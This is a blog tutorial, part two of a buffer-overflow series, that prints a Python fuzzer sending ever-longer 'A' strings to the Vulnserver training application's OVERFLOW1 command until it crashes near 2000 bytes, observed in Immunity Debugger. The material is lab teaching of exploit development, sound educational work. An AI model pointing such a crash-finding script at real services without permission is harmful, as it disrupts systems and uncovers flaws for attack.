Buffer overflow Beginner To Advance part2

Greeting Everyone! Today we will learn how to perform fuzzing as our previous blog we discussed Basic structure of buffer overflow today in this blog we will start from fuzzing with suitable example .

What is Fuzzing?

  Fuzzing is automated script where it is send continuously bytes to vulnerable application to check application is vulnerable of buffer overflow or not.

Vulnserver is running on port number 9999

Python Code For Fuzzing :-

  • #!/usr/bin/python
  • import socket, time, sys
  • ip = “172.16.0.10”
  • port = 9999
  • timeout = 5
  • buffer = []
  • counter = 100
  • while len(buffer) < 30:
  • buffer.append(“A” * counter)
  • counter += 100
  • for string in buffer:
  • try:
  • s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  • s.settimeout(timeout)
  • connect = s.connect((ip, port))
  • s.recv(1024)
  • print(“Fuzzing with %s bytes” % len(string))
  • s.send(“OVERFLOW1 ” + string + “\r\n”)
  • s.recv(1024)
  • s.close()
  • except:
  • print(“Could not connect to ” + ip + “:” + str(port))
  • sys.exit(0)
  • time.sleep(1)

As Above we run the script and script started sending packet continuously towards vulnserver. Here we monitor script stopped on 2000 bytes because vulnserver stopped responding.

Below I attached both screenshot one of script response and second of vulnserver status.

FUZZING

Now Another screen it paused as our Vulnerable software is running on Immunity Debugger ,

From Immunity Debugger

As above Example Scenario We discussed How fuzzing work How we can validate buffer size using fuzzing with Python script For More Read.   In this Fuzzing section we learn how to write script and perform fuzzing on application to find the buffer overflow vulnerability.

Thanks For Reading……. See You In Another Blog!

Stick With Our Blog : https://securiumsolutions.com/blog/

Author : Shubham Jaiswal | WEB VAPT (Intern)

Leave a Comment

Your email address will not be published. Required fields are marked *